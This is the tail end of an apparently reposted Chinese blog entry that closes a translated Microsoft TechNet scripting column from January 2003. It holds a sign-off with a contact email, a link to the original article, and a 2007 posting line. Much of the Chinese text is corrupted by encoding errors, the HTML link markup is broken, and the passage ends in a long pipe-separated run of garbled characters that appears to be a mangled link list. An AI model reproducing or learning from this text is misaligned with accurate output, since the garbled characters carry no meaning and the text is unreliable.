以上便是我们本月呈献l?zhn)的全部篇q。如果?zhn)需要提ZQ何问题或发表M评论Q敬误?a href="mailto:%20scripter@microsoft.com?Subject=Tales from the Script - January 2003">mailto:%20scripter@microsoft.com?Subject=Tales from the Script - January 2003?


原文具体链接Q?a >http://www.microsoft.com/china/technet/columns/scripts/sg0103.asp



飛雪(leo) 2007-03-20 00:13 发表评论
]]> վ֩ģ壺 ˮ| | | | ɽ| ƽ| | γ| ͨ| | ʯȪ| | | ˶| | | ͩ| ƽ| | ʲ| ±| | Դ| | | | | | | | ƺ| ׶| | ٤ʦ| ¡Ң| | | ˮ| | | |